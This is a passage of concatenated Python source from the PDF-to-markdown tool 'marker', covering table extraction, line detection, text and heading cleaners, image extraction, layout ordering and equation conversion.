best_alignment def score_table(hypothesis, reference): hypothesis = split_to_cells(hypothesis) reference = split_to_cells(reference) alignments = [] for i in range(0, len(reference)): alignments.extend(align_rows(hypothesis, reference[i])) return sum(alignments) / len(alignments) File: marker/tables/edges.py import math import cv2 import numpy as np def get_detected_lines_sobel(image): sobelx = cv2.Sobel(image, cv2.CV_32F, 1, 0, ksize=3) scaled_sobel = np.uint8(255 * sobelx / np.max(sobelx)) kernel = np.ones((4, 1), np.uint8) eroded = cv2.erode(scaled_sobel, kernel, iterations=1) scaled_sobel = cv2.dilate(eroded, kernel, iterations=3) return scaled_sobel def get_line_angle(x1, y1, x2, y2): slope = (y2 - y1) / (x2 - x1) angle_radians = math.atan(slope) angle_degrees = math.degrees(angle_radians) return angle_degrees def get_detected_lines(image, slope_tol_deg=10): new_image = image.astype(np.float32) * 255 # Convert to 0-255 range new_image = get_detected_lines_sobel(new_image) new_image = new_image.astype(np.uint8) edges = cv2.Canny(new_image, 50, 200, apertureSize=3) lines = cv2.HoughLinesP(edges, 1, np.pi / 180, threshold=50, minLineLength=2, maxLineGap=100) line_info = [] if lines is not None: for line in lines: x1, y1, x2, y2 = line[0] bbox = [x1, y1, x2, y2] vertical = False if x2 == x1: vertical = True else: line_angle = get_line_angle(x1, y1, x2, y2) if 90 - slope_tol_deg < line_angle < 90 + slope_tol_deg: vertical = True elif -90 - slope_tol_deg < line_angle < -90 + slope_tol_deg: vertical = True if not vertical: continue if bbox[3] < bbox[1]: 
bbox[1], bbox[3] = bbox[3], bbox[1] if bbox[2] < bbox[0]: bbox[0], bbox[2] = bbox[2], bbox[0] if vertical: line_info.append(bbox) return line_info def get_vertical_lines(image, divisor=2, x_tolerance=10, y_tolerance=1): vertical_lines = get_detected_lines(image) vertical_lines = sorted(vertical_lines, key=lambda x: x[0]) for line in vertical_lines: for i in range(0, len(line)): line[i] = (line[i] // divisor) * divisor # Merge adjacent line segments together to_remove = [] for i, line in enumerate(vertical_lines): for j, line2 in enumerate(vertical_lines): if j <= i: continue if line[0] != line2[0]: continue expanded_line1 = [line[0], line[1] - y_tolerance, line[2], line[3] + y_tolerance] line1_points = set(range(int(expanded_line1[1]), int(expanded_line1[3]))) line2_points = set(range(int(line2[1]), int(line2[3]))) intersect_y = len(line1_points.intersection(line2_points)) > 0 if intersect_y: vertical_lines[j][1] = min(line[1], line2[1]) vertical_lines[j][3] = max(line[3], line2[3]) to_remove.append(i) vertical_lines = [line for i, line in enumerate(vertical_lines) if i not in to_remove] # Remove redundant segments to_remove = [] for i, line in enumerate(vertical_lines): if i in to_remove: continue for j, line2 in enumerate(vertical_lines): if j <= i or j in to_remove: continue close_in_x = abs(line[0] - line2[0]) < x_tolerance line1_points = set(range(int(line[1]), int(line[3]))) line2_points = set(range(int(line2[1]), int(line2[3]))) intersect_y = len(line1_points.intersection(line2_points)) > 0 if close_in_x and intersect_y: # Keep the longer line and extend it if len(line2_points) > len(line1_points): vertical_lines[j][1] = min(line[1], line2[1]) vertical_lines[j][3] = max(line[3], line2[3]) to_remove.append(i) else: vertical_lines[i][1] = min(line[1], line2[1]) vertical_lines[i][3] = max(line[3], line2[3]) to_remove.append(j) vertical_lines = [line for i, line in enumerate(vertical_lines) if i not in to_remove] return vertical_lines File: marker/tables/utils.py import re def sort_table_blocks(blocks, tolerance=5): vertical_groups = {} for block in blocks: if hasattr(block, "bbox"): bbox = block.bbox else: bbox = block["bbox"] group_key = round((bbox[1] + bbox[3]) / 2 / tolerance) if group_key not in vertical_groups: vertical_groups[group_key] = [] vertical_groups[group_key].append(block) # Sort each group horizontally and flatten the groups into a single list sorted_blocks = [] for _, group in sorted(vertical_groups.items()): sorted_group = sorted(group, key=lambda x: x.bbox[0] if hasattr(x, "bbox") else x["bbox"][0]) sorted_blocks.extend(sorted_group) return sorted_blocks def replace_dots(text): dot_pattern = re.compile(r'(\s*\.\s*){4,}') dot_multiline_pattern = re.compile(r'.*(\s*\.\s*){4,}.*', re.DOTALL) if dot_multiline_pattern.match(text): text = dot_pattern.sub(' ', text) return text def replace_newlines(text): # Replace all newlines newline_pattern = re.compile(r'[\r\n]+') return newline_pattern.sub(' ', text).strip() File: marker/tables/table.py from marker.schema.bbox import merge_boxes, box_intersection_pct, rescale_bbox from marker.schema.block import Line, Span, Block from marker.schema.page import Page from tabulate import tabulate from typing import List from marker.settings import settings from marker.tables.cells import assign_cells_to_columns from marker.tables.utils import sort_table_blocks, replace_dots, replace_newlines def get_table_surya(page, table_box, space_tol=.01) -> List[List[str]]: table_rows = [] table_row = [] x_position = None sorted_blocks = 
sort_table_blocks(page.blocks) for block_idx, block in enumerate(sorted_blocks): sorted_lines = sort_table_blocks(block.lines) for line_idx, line in enumerate(sorted_lines): line_bbox = line.bbox intersect_pct = box_intersection_pct(line_bbox, table_box) if intersect_pct < settings.TABLE_INTERSECTION_THRESH or len(line.spans) == 0: continue normed_x_start = line_bbox[0] / page.width normed_x_end = line_bbox[2] / page.width cells = [[s.bbox, s.text] for s in line.spans] if x_position is None or normed_x_start > x_position - space_tol: # Same row table_row.extend(cells) else: # New row if len(table_row) > 0: table_rows.append(table_row) table_row = cells x_position = normed_x_end if len(table_row) > 0: table_rows.append(table_row) table_rows = assign_cells_to_columns(page, table_box, table_rows) return table_rows def get_table_pdftext(page: Page, table_box, space_tol=.01, round_factor=4) -> List[List[str]]: page_width = page.width table_rows = [] table_cell = "" cell_bbox = None table_row = [] sorted_char_blocks = sort_table_blocks(page.char_blocks) table_width = table_box[2] - table_box[0] new_line_start_x = table_box[0] + table_width * .3 table_width_pct = (table_width / page_width) * .95 for block_idx, block in enumerate(sorted_char_blocks): sorted_lines = sort_table_blocks(block["lines"]) for line_idx, line in enumerate(sorted_lines): line_bbox = line["bbox"] intersect_pct = box_intersection_pct(line_bbox, table_box) if intersect_pct < settings.TABLE_INTERSECTION_THRESH: continue for span in line["spans"]: for char in span["chars"]: x_start, y_start, x_end, y_end = char["bbox"] x_start /= page_width x_end /= page_width fullwidth_cell = False if cell_bbox is not None: # Find boundaries of cell bbox before merging cell_x_start, cell_y_start, cell_x_end, cell_y_end = cell_bbox cell_x_start /= page_width cell_x_end /= page_width fullwidth_cell = cell_x_end - cell_x_start >= table_width_pct cell_content = replace_dots(replace_newlines(table_cell)) if cell_bbox is None: # First char table_cell += char["char"] cell_bbox = char["bbox"] # Check if we are in the same cell, ensure cell is not full table width (like if stray text gets included in the table) elif (cell_x_start - space_tol < x_start < cell_x_end + space_tol) and not fullwidth_cell: table_cell += char["char"] cell_bbox = merge_boxes(cell_bbox, char["bbox"]) # New line and cell # Use x_start < new_line_start_x to account for out-of-order cells in the pdf elif x_start < cell_x_end - space_tol and x_start < new_line_start_x: if len(table_cell) > 0: table_row.append((cell_bbox, cell_content)) table_cell = char["char"] cell_bbox = char["bbox"] if len(table_row) > 0: table_row = sorted(table_row, key=lambda x: round(x[0][0] / round_factor)) table_rows.append(table_row) table_row = [] else: # Same line, new cell, check against cell bbox if len(table_cell) > 0: table_row.append((cell_bbox, cell_content)) table_cell = char["char"] cell_bbox = char["bbox"] if len(table_cell) > 0: table_row.append((cell_bbox, replace_dots(replace_newlines(table_cell)))) if len(table_row) > 0: table_row = sorted(table_row, key=lambda x: round(x[0][0] / round_factor)) table_rows.append(table_row) total_cells = sum([len(row) for row in table_rows]) if total_cells > 0: table_rows = assign_cells_to_columns(page, table_box, table_rows) return table_rows else: return [] def merge_tables(page_table_boxes): # Merge tables that are next to each other expansion_factor = 1.02 shrink_factor = .98 ignore_boxes = set() for i in range(len(page_table_boxes)): if i in 
ignore_boxes: continue for j in range(i + 1, len(page_table_boxes)): if j in ignore_boxes: continue expanded_box1 = [page_table_boxes[i][0] * shrink_factor, page_table_boxes[i][1], page_table_boxes[i][2] * expansion_factor, page_table_boxes[i][3]] expanded_box2 = [page_table_boxes[j][0] * shrink_factor, page_table_boxes[j][1], page_table_boxes[j][2] * expansion_factor, page_table_boxes[j][3]] if box_intersection_pct(expanded_box1, expanded_box2) > 0: page_table_boxes[i] = merge_boxes(page_table_boxes[i], page_table_boxes[j]) ignore_boxes.add(j) return [b for i, b in enumerate(page_table_boxes) if i not in ignore_boxes] def format_tables(pages: List[Page]): # Formats tables nicely into github flavored markdown table_count = 0 for page in pages: table_insert_points = {} blocks_to_remove = set() pnum = page.pnum page_table_boxes = [b for b in page.layout.bboxes if b.label == "Table"] page_table_boxes = [rescale_bbox(page.layout.image_bbox, page.bbox, b.bbox) for b in page_table_boxes] page_table_boxes = merge_tables(page_table_boxes) for table_idx, table_box in enumerate(page_table_boxes): for block_idx, block in enumerate(page.blocks): intersect_pct = block.intersection_pct(table_box) if intersect_pct > settings.TABLE_INTERSECTION_THRESH and block.block_type == "Table": if table_idx not in table_insert_points: table_insert_points[table_idx] = max(0, block_idx - len(blocks_to_remove)) # Where to insert the new table blocks_to_remove.add(block_idx) new_page_blocks = [] for block_idx, block in enumerate(page.blocks): if block_idx in blocks_to_remove: continue new_page_blocks.append(block) for table_idx, table_box in enumerate(page_table_boxes): if table_idx not in table_insert_points: continue if page.ocr_method == "surya": table_rows = get_table_surya(page, table_box) else: table_rows = get_table_pdftext(page, table_box) # Skip empty tables if len(table_rows) == 0: continue table_text = tabulate(table_rows, headers="firstrow", tablefmt="github", disable_numparse=True) table_block = Block( bbox=table_box, block_type="Table", pnum=pnum, lines=[Line( bbox=table_box, spans=[Span( bbox=table_box, span_id=f"{table_idx}_table", font="Table", font_size=0, font_weight=0, block_type="Table", text=table_text )] )] ) insert_point = table_insert_points[table_idx] insert_point = min(insert_point, len(new_page_blocks)) new_page_blocks.insert(insert_point, table_block) table_count += 1 page.blocks = new_page_blocks return table_count File: marker/tables/cells.py from marker.schema.bbox import rescale_bbox, box_intersection_pct from marker.schema.page import Page import numpy as np from sklearn.cluster import DBSCAN from marker.settings import settings def cluster_coords(coords, row_count): if len(coords) == 0: return [] coords = np.array(sorted(set(coords))).reshape(-1, 1) clustering = DBSCAN(eps=.01, min_samples=max(2, row_count // 4)).fit(coords) clusters = clustering.labels_ separators = [] for label in set(clusters): clustered_points = coords[clusters == label] separators.append(np.mean(clustered_points)) separators = sorted(separators) return separators def find_column_separators(page: Page, table_box, rows, round_factor=.002, min_count=1): left_edges = [] right_edges = [] centers = [] line_boxes = [p.bbox for p in page.text_lines.bboxes] line_boxes = [rescale_bbox(page.text_lines.image_bbox, page.bbox, l) for l in line_boxes] line_boxes = [l for l in line_boxes if box_intersection_pct(l, table_box) > settings.BBOX_INTERSECTION_THRESH] pwidth = page.bbox[2] - page.bbox[0] pheight = page.bbox[3] - 
page.bbox[1] for cell in line_boxes: ncell = [cell[0] / pwidth, cell[1] / pheight, cell[2] / pwidth, cell[3] / pheight] left_edges.append(ncell[0] / round_factor * round_factor) right_edges.append(ncell[2] / round_factor * round_factor) centers.append((ncell[0] + ncell[2]) / 2 * round_factor / round_factor) left_edges = [l for l in left_edges if left_edges.count(l) > min_count] right_edges = [r for r in right_edges if right_edges.count(r) > min_count] centers = [c for c in centers if centers.count(c) > min_count] sorted_left = cluster_coords(left_edges, len(rows)) sorted_right = cluster_coords(right_edges, len(rows)) sorted_center = cluster_coords(centers, len(rows)) # Find list with minimum length separators = max([sorted_left, sorted_right, sorted_center], key=len) separators.append(1) separators.insert(0, 0) return separators def assign_cells_to_columns(page, table_box, rows, round_factor=.002, tolerance=.01): separators = find_column_separators(page, table_box, rows, round_factor=round_factor) additional_column_index = 0 pwidth = page.bbox[2] - page.bbox[0] row_dicts = [] for row in rows: new_row = {} last_col_index = -1 for cell in row: left_edge = cell[0][0] / pwidth column_index = -1 for i, separator in enumerate(separators): if left_edge - tolerance < separator and last_col_index < i: column_index = i break if column_index == -1: column_index = len(separators) + additional_column_index additional_column_index += 1 new_row[column_index] = cell[1] last_col_index = column_index additional_column_index = 0 row_dicts.append(new_row) max_row_idx = 0 for row in row_dicts: max_row_idx = max(max_row_idx, max(row.keys())) # Assign sorted cells to columns, account for blanks new_rows = [] for row in row_dicts: flat_row = [] for row_idx in range(1, max_row_idx + 1): if row_idx in row: flat_row.append(row[row_idx]) else: flat_row.append("") new_rows.append(flat_row) # Pad rows to have the same length max_row_len = max([len(r) for r in new_rows]) for row in new_rows: while len(row) < max_row_len: row.append("") cols_to_remove = set() for idx, col in enumerate(zip(*new_rows)): col_total = sum([len(cell.strip()) > 0 for cell in col]) if col_total == 0: cols_to_remove.add(idx) rows = [] for row in new_rows: rows.append([col for idx, col in enumerate(row) if idx not in cols_to_remove]) return rows File: marker/cleaners/headings.py from typing import List from marker.settings import settings from marker.schema.bbox import rescale_bbox from marker.schema.block import bbox_from_lines from marker.schema.page import Page def split_heading_blocks(pages: List[Page]): # Heading lines can be combined into regular text blocks sometimes by pdftext # Split up heading lines into separate blocks properly for page in pages: page_heading_boxes = [b for b in page.layout.bboxes if b.label in ["Title", "Section-header"]] page_heading_boxes = [(rescale_bbox(page.layout.image_bbox, page.bbox, b.bbox), b.label) for b in page_heading_boxes] new_blocks = [] for block_idx, block in enumerate(page.blocks): if block.block_type not in ["Text"]: new_blocks.append(block) continue heading_lines = [] for line_idx, line in enumerate(block.lines): for (heading_box, label) in page_heading_boxes: if line.intersection_pct(heading_box) > settings.BBOX_INTERSECTION_THRESH: heading_lines.append((line_idx, label)) break if len(heading_lines) == 0: new_blocks.append(block) continue # Split up the block into separate blocks around headers start = 0 for (heading_line, label) in heading_lines: if start < heading_line: copied_block = 
block.copy() copied_block.lines = block.lines[start:heading_line] copied_block.bbox = bbox_from_lines(copied_block.lines) new_blocks.append(copied_block) copied_block = block.copy() copied_block.lines = block.lines[heading_line:heading_line + 1] copied_block.block_type = label copied_block.bbox = bbox_from_lines(copied_block.lines) new_blocks.append(copied_block) start = heading_line + 1 if start >= len(block.lines): break # Add any remaining lines if start < len(block.lines): copied_block = block.copy() copied_block.lines = block.lines[start:] copied_block.bbox = bbox_from_lines(copied_block.lines) new_blocks.append(copied_block) page.blocks = new_blocks File: marker/cleaners/bullets.py import re def replace_bullets(text): # Replace bullet characters with a - bullet_pattern = r"(^|[\n ])[•●○■▪▫–—]( )" replaced_string = re.sub(bullet_pattern, r"\1-\2", text) return replaced_string File: marker/cleaners/code.py from collections import Counter from statistics import mean, median from marker.schema.block import Span, Line from marker.schema.page import Page import re from typing import List def is_code_linelen(lines, thresh=80): # Decide based on chars per newline threshold total_alnum_chars = sum(len(re.findall(r'\w', line.prelim_text)) for line in lines) total_newlines = max(len(lines) - 1, 1) if total_alnum_chars == 0: return False ratio = total_alnum_chars / total_newlines return ratio < thresh def comment_count(lines): pattern = re.compile(r"^(//|#|'|--|/\*|'''|\"\"\"|--\[\[|<!--|%|%{|\(\*)") return sum([1 for line in lines if pattern.match(line)]) def identify_code_blocks(pages: List[Page]): code_block_count = 0 font_sizes = [] line_heights = [] for page in pages: font_sizes += page.get_font_sizes() line_heights += page.get_line_heights() avg_font_size = None avg_line_height = None if len(font_sizes) > 0: avg_line_height = median(line_heights) avg_font_size = mean(font_sizes) for page in pages: for block in page.blocks: if block.block_type != "Text": last_block = block continue # Ensure we have lines and spans if len(block.lines) == 0: continue if sum([len(line.spans) for line in block.lines]) == 0: continue min_start = block.get_min_line_start() is_indent = [] line_fonts = [] line_font_sizes = [] block_line_heights = [] for line in block.lines: line_fonts += [span.font for span in line.spans] line_font_sizes += [span.font_size for span in line.spans] block_line_heights.append(line.bbox[3] - line.bbox[1]) is_indent.append(line.bbox[0] > min_start) comment_lines = comment_count([line.prelim_text for line in block.lines]) is_code = [ len(block.lines) > 3, is_code_linelen(block.lines), sum(is_indent) + comment_lines > len(block.lines) * .7, # Indentation and comments are a majority ] if avg_font_size is not None: font_checks = [ mean(line_font_sizes) <= avg_font_size * .8, # Lower than average font size and line height mean(block_line_heights) < avg_line_height * .8 ] is_code += font_checks if all(is_code): code_block_count += 1 block.block_type = "Code" return code_block_count def indent_blocks(pages: List[Page]): span_counter = 0 for page in pages: for block in page.blocks: if block.block_type != "Code": continue lines = [] min_left = 1000 # will contain x- coord of column 0 col_width = 0 # width of 1 char for line in block.lines: text = "" min_left = min(line.bbox[0], min_left) for span in line.spans: if col_width == 0 and len(span.text) > 0: col_width = (span.bbox[2] - span.bbox[0]) / len(span.text) text += span.text lines.append((line.bbox, text)) block_text = "" blank_line = False 
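            # (Editor's note, added) The loop below reconstructs code indentation from
            # layout geometry: each line's left x-offset relative to the leftmost line
            # (min_left) is divided by the estimated character width (col_width) to get
            # the number of leading spaces to prepend.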
for line in lines: text = line[1] if col_width == 0: prefix = "" else: prefix = " " * int((line[0][0] - min_left) / col_width) current_line_blank = len(text.strip()) == 0 if blank_line and current_line_blank: # Don't put multiple blank lines in a row continue block_text += prefix + text + "\n" blank_line = current_line_blank new_span = Span( text=block_text, bbox=block.bbox, span_id=f"{span_counter}_fix_code", font=block.lines[0].spans[0].font, font_weight=block.lines[0].spans[0].font_weight, font_size=block.lines[0].spans[0].font_size, ) span_counter += 1 block.lines = [Line(spans=[new_span], bbox=block.bbox)] File: marker/cleaners/fontstyle.py from typing import List from marker.schema.page import Page def find_bold_italic(pages: List[Page], bold_min_weight=600): font_weights = [] for page in pages: for block in page.blocks: # We don't want to bias our font stats if block.block_type in ["Title", "Section-header"]: continue for line in block.lines: for span in line.spans: if "bold" in span.font.lower(): span.bold = True if "ital" in span.font.lower(): span.italic = True font_weights.append(span.font_weight) if len(font_weights) == 0: return for page in pages: for block in page.blocks: for line in block.lines: for span in line.spans: if span.font_weight >= bold_min_weight: span.bold = True File: marker/cleaners/text.py import re def cleanup_text(full_text): full_text = re.sub(r'\n{3,}', '\n\n', full_text) full_text = re.sub(r'(\n\s){3,}', '\n\n', full_text) full_text = full_text.replace('\xa0', ' ') # Replace non-breaking spaces return full_text File: marker/cleaners/headers.py import re from collections import Counter from rapidfuzz import fuzz from marker.schema.merged import FullyMergedBlock from typing import List, Tuple def filter_common_elements(lines, page_count, threshold=.6): # We can't filter if we don't have enough pages to find common elements if page_count < 3: return [] text = [s.text for line in lines for s in line.spans if len(s.text) > 4] counter = Counter(text) common = [k for k, v in counter.items() if v > page_count * threshold] bad_span_ids = [s.span_id for line in lines for s in line.spans if s.text in common] return bad_span_ids def filter_header_footer(all_page_blocks, max_selected_lines=2): first_lines = [] last_lines = [] for page in all_page_blocks: nonblank_lines = page.get_nonblank_lines() first_lines.extend(nonblank_lines[:max_selected_lines]) last_lines.extend(nonblank_lines[-max_selected_lines:]) bad_span_ids = filter_common_elements(first_lines, len(all_page_blocks)) bad_span_ids += filter_common_elements(last_lines, len(all_page_blocks)) return bad_span_ids def replace_leading_trailing_digits(string, replacement): string = re.sub(r'^\d+', replacement, string) string = re.sub(r'\d+$', replacement, string) return string def find_overlap_elements(lst: List[Tuple[str, int]], string_match_thresh=.9, min_overlap=.05) -> List[int]: # Initialize a list to store the elements that meet the criteria result = [] titles = [l[0] for l in lst] for i, (str1, id_num) in enumerate(lst): overlap_count = 0 # Count the number of elements that overlap by at least 80% for j, str2 in enumerate(titles): if i != j and fuzz.ratio(str1, str2) >= string_match_thresh * 100: overlap_count += 1 # Check if the element overlaps with at least 50% of other elements if overlap_count >= max(3.0, len(lst) * min_overlap): result.append(id_num) return result def filter_common_titles(merged_blocks: List[FullyMergedBlock]) -> List[FullyMergedBlock]: titles = [] for i, block in 
enumerate(merged_blocks): if block.block_type in ["Title", "Section-header"]: text = block.text if text.strip().startswith("#"): text = re.sub(r'#+', '', text) text = text.strip() # Remove page numbers from start/end text = replace_leading_trailing_digits(text, "").strip() titles.append((text, i)) bad_block_ids = find_overlap_elements(titles) new_blocks = [] for i, block in enumerate(merged_blocks): if i in bad_block_ids: continue new_blocks.append(block) return new_blocks File: marker/images/save.py from typing import List from marker.schema.page import Page def get_image_filename(page: Page, image_idx): return f"{page.pnum}_image_{image_idx}.png" def images_to_dict(pages: List[Page]): images = {} for page in pages: if page.images is None: continue for image_idx, image in enumerate(page.images): image_filename = get_image_filename(page, image_idx) images[image_filename] = image return images File: marker/images/extract.py from marker.images.save import get_image_filename from marker.pdf.images import render_bbox_image from marker.schema.bbox import rescale_bbox from marker.schema.block import find_insert_block, Span, Line from marker.settings import settings def find_image_blocks(page): image_blocks = [] image_regions = [l.bbox for l in page.layout.bboxes if l.label in ["Figure", "Picture"]] image_regions = [rescale_bbox(page.layout.image_bbox, page.bbox, b) for b in image_regions] insert_points = {} for region_idx, region in enumerate(image_regions): for block_idx, block in enumerate(page.blocks): for line_idx, line in enumerate(block.lines): if line.intersection_pct(region) > settings.BBOX_INTERSECTION_THRESH: line.spans = [] # We will remove this line from the block if region_idx not in insert_points: insert_points[region_idx] = (block_idx, line_idx) # Account for images with no detected lines for region_idx, region in enumerate(image_regions): if region_idx in insert_points: continue insert_points[region_idx] = (find_insert_block(page.blocks, region), 0) for region_idx, image_region in enumerate(image_regions): image_insert = insert_points[region_idx] image_blocks.append([image_insert[0], image_insert[1], image_region]) return image_blocks def extract_page_images(page_obj, page): page.images = [] image_blocks = find_image_blocks(page) for image_idx, (block_idx, line_idx, bbox) in enumerate(image_blocks): if block_idx >= len(page.blocks): block_idx = len(page.blocks) - 1 if block_idx < 0: continue block = page.blocks[block_idx] image = render_bbox_image(page_obj, page, bbox) image_filename = get_image_filename(page, image_idx) image_markdown = f"\n\n![{image_filename}]({image_filename})\n\n" image_span = Span( bbox=bbox, text=image_markdown, font="Image", rotation=0, font_weight=0, font_size=0, image=True, span_id=f"image_{image_idx}" ) # Sometimes, the block has zero lines if len(block.lines) > line_idx: block.lines[line_idx].spans.append(image_span) else: line = Line( bbox=bbox, spans=[image_span] ) block.lines.append(line) page.images.append(image) def extract_images(doc, pages): for page_idx, page in enumerate(pages): page_obj = doc[page_idx] extract_page_images(page_obj, page) File: marker/layout/layout.py from typing import List from surya.layout import batch_layout_detection from marker.pdf.images import render_image from marker.schema.bbox import rescale_bbox from marker.schema.page import Page from marker.settings import settings def get_batch_size(): if settings.LAYOUT_BATCH_SIZE is not None: return settings.LAYOUT_BATCH_SIZE elif settings.TORCH_DEVICE_MODEL == "cuda": return 
6 return 6 def surya_layout(doc, pages: List[Page], layout_model, batch_multiplier=1): images = [render_image(doc[pnum], dpi=settings.SURYA_LAYOUT_DPI) for pnum in range(len(pages))] text_detection_results = [p.text_lines for p in pages] processor = layout_model.processor layout_results = batch_layout_detection(images, layout_model, processor, detection_results=text_detection_results, batch_size=int(get_batch_size() * batch_multiplier)) for page, layout_result in zip(pages, layout_results): page.layout = layout_result def annotate_block_types(pages: List[Page]): for page in pages: max_intersections = {} for i, block in enumerate(page.blocks): for j, layout_block in enumerate(page.layout.bboxes): layout_bbox = layout_block.bbox layout_bbox = rescale_bbox(page.layout.image_bbox, page.bbox, layout_bbox) intersection_pct = block.intersection_pct(layout_bbox) if i not in max_intersections: max_intersections[i] = (intersection_pct, j) elif intersection_pct > max_intersections[i][0]: max_intersections[i] = (intersection_pct, j) for i, block in enumerate(page.blocks): block = page.blocks[i] block_type = "Text" if i in max_intersections: j = max_intersections[i][1] block_type = page.layout.bboxes[j].label block.block_type = block_type File: marker/layout/order.py from collections import defaultdict from typing import List from surya.ordering import batch_ordering from marker.pdf.images import render_image from marker.pdf.utils import sort_block_group from marker.schema.bbox import rescale_bbox from marker.schema.page import Page from marker.settings import settings def get_batch_size(): if settings.ORDER_BATCH_SIZE is not None: return settings.ORDER_BATCH_SIZE elif settings.TORCH_DEVICE_MODEL == "cuda": return 6 elif settings.TORCH_DEVICE_MODEL == "mps": return 6 return 6 def surya_order(doc, pages: List[Page], order_model, batch_multiplier=1): images = [render_image(doc[pnum], dpi=settings.SURYA_ORDER_DPI) for pnum in range(len(pages))] # Get bboxes for all pages bboxes = [] for page in pages: bbox = [b.bbox for b in page.layout.bboxes][:settings.ORDER_MAX_BBOXES] bboxes.append(bbox) processor = order_model.processor order_results = batch_ordering(images, bboxes, order_model, processor, batch_size=int(get_batch_size() * batch_multiplier)) for page, order_result in zip(pages, order_results): page.order = order_result def sort_blocks_in_reading_order(pages: List[Page]): for page in pages: order = page.order block_positions = {} max_position = 0 for i, block in enumerate(page.blocks): for order_box in order.bboxes: order_bbox = order_box.bbox position = order_box.position order_bbox = rescale_bbox(order.image_bbox, page.bbox, order_bbox) block_intersection = block.intersection_pct(order_bbox) if i not in block_positions: block_positions[i] = (block_intersection, position) elif block_intersection > block_positions[i][0]: block_positions[i] = (block_intersection, position) max_position = max(max_position, position) block_groups = defaultdict(list) for i, block in enumerate(page.blocks): if i in block_positions: position = block_positions[i][1] else: max_position += 1 position = max_position block_groups[position].append(block) new_blocks = [] for position in sorted(block_groups.keys()): block_group = sort_block_group(block_groups[position]) new_blocks.extend(block_group) page.blocks = new_blocks File: marker/equations/inference.py from texify.inference import batch_inference from tqdm import tqdm from marker.settings import settings import os os.environ["TOKENIZERS_PARALLELISM"] = "false" def 
get_batch_size(): if settings.TEXIFY_BATCH_SIZE is not None: return settings.TEXIFY_BATCH_SIZE elif settings.TORCH_DEVICE_MODEL == "cuda": return 6 elif settings.TORCH_DEVICE_MODEL == "mps": return 6 return 2 def get_latex_batched(images, token_counts, texify_model, batch_multiplier=1): if len(images) == 0: return [] predictions = [""] * len(images) batch_size = get_batch_size() * batch_multiplier for i in tqdm(range(0, len(images), batch_size), desc="Recognizing equations"): # Dynamically set max length to save inference time min_idx = i max_idx = min(min_idx + batch_size, len(images)) max_length = max(token_counts[min_idx:max_idx]) max_length = min(max_length, settings.TEXIFY_MODEL_MAX) max_length += settings.TEXIFY_TOKEN_BUFFER model_output = batch_inference(images[min_idx:max_idx], texify_model, texify_model.processor, max_tokens=max_length) for j, output in enumerate(model_output): token_count = get_total_texify_tokens(output, texify_model.processor) if token_count >= max_length - 1: output = "" image_idx = i + j predictions[image_idx] = output return predictions def get_total_texify_tokens(text, processor): tokenizer = processor.tokenizer tokens = tokenizer(text) return len(tokens["input_ids"]) File: marker/equations/equations.py from collections import defaultdict from copy import deepcopy from typing import List from marker.debug.data import dump_equation_debug_data from marker.equations.inference import get_total_texify_tokens, get_latex_batched from marker.pdf.images import render_bbox_image from marker.schema.bbox import rescale_bbox from marker.schema.page import Page from marker.schema.block import Line, Span, Block, bbox_from_lines, split_block_lines, find_insert_block from marker.settings import settings def find_equation_blocks(page, processor): equation_blocks = [] equation_regions = [l.bbox for l in page.layout.bboxes if l.label in ["Formula"]] equation_regions = [rescale_bbox(page.layout.image_bbox, page.bbox, b) for b in equation_regions] lines_to_remove = defaultdict(list) insert_points = {} equation_lines = defaultdict(list) for region_idx, region in enumerate(equation_regions): for block_idx, block in enumerate(page.blocks): for line_idx, line in enumerate(block.lines): if line.intersection_pct(region) > settings.BBOX_INTERSECTION_THRESH: # We will remove this line from the block lines_to_remove[region_idx].append((block_idx, line_idx)) equation_lines[region_idx].append(line) if region_idx not in insert_points: insert_points[region_idx] = (block_idx, line_idx) # Account for regions where the lines were not detected for region_idx, region in enumerate(equation_regions): if region_idx in insert_points: continue insert_points[region_idx] = (find_insert_block(page.blocks, region), 0) block_lines_to_remove = defaultdict(set) for region_idx, equation_region in enumerate(equation_regions): if region_idx not in equation_lines or len(equation_lines[region_idx]) == 0: block_text = "" total_tokens = 0 else: equation_block = equation_lines[region_idx] block_text = " ".join([line.prelim_text for line in equation_block]) total_tokens = get_total_texify_tokens(block_text, processor) equation_insert = insert_points[region_idx] equation_insert_line_idx = equation_insert[1] equation_insert_line_idx -= len( [x for x in lines_to_remove[region_idx] if x[0] == equation_insert[0] and x[1] < equation_insert[1]]) selected_blocks = [equation_insert[0], equation_insert_line_idx, total_tokens, block_text, equation_region] if total_tokens < settings.TEXIFY_MODEL_MAX: # Account for the lines 
we're about to remove for item in lines_to_remove[region_idx]: block_lines_to_remove[item[0]].add(item[1]) equation_blocks.append(selected_blocks) # Remove the lines from the blocks for block_idx, bad_lines in block_lines_to_remove.items(): block = page.blocks[block_idx] block.lines = [line for idx, line in enumerate(block.lines) if idx not in bad_lines] return equation_blocks def increment_insert_points(page_equation_blocks, insert_block_idx, insert_count): for idx, (block_idx, line_idx, token_count, block_text, equation_bbox) in enumerate(page_equation_blocks): if block_idx >= insert_block_idx: page_equation_blocks[idx][0] += insert_count def insert_latex_block(page_blocks: Page, page_equation_blocks, predictions, pnum, processor): converted_spans = [] idx = 0 success_count = 0 fail_count = 0 for block_number, (insert_block_idx, insert_line_idx, token_count, block_text, equation_bbox) in enumerate(page_equation_blocks): latex_text = predictions[block_number] conditions = [ get_total_texify_tokens(latex_text, processor) < settings.TEXIFY_MODEL_MAX, # Make sure we didn't get to the overall token max, indicates run-on len(latex_text) > len(block_text) * .7, len(latex_text.strip()) > 0 ] new_block = Block( lines=[Line( spans=[ Span( text=block_text.replace("\n", " "), bbox=equation_bbox, span_id=f"{pnum}_{idx}_fixeq", font="Latex", font_weight=0, font_size=0 ) ], bbox=equation_bbox )], bbox=equation_bbox, block_type="Formula", pnum=pnum ) if not all(conditions): fail_count += 1 else: success_count += 1 new_block.lines[0].spans[0].text = latex_text.replace("\n", " ") converted_spans.append(deepcopy(new_block.lines[0].spans[0])) # Add in the new LaTeX block if insert_line_idx == 0: page_blocks.blocks.insert(insert_block_idx, new_block) increment_insert_points(page_equation_blocks, insert_block_idx, 1) elif insert_line_idx >= len(page_blocks.blocks[insert_block_idx].lines): page_blocks.blocks.insert(insert_block_idx + 1, new_block) increment_insert_points(page_equation_blocks, insert_block_idx + 1, 1) else: new_blocks = [] for block_idx, block in enumerate(page_blocks.blocks): if block_idx == insert_block_idx: split_block = split_block_lines(block, insert_line_idx) new_blocks.append(split_block[0]) new_blocks.append(new_block) new_blocks.append(split_block[1]) increment_insert_points(page_equation_blocks, insert_block_idx, 2) else: new_blocks.append(block) 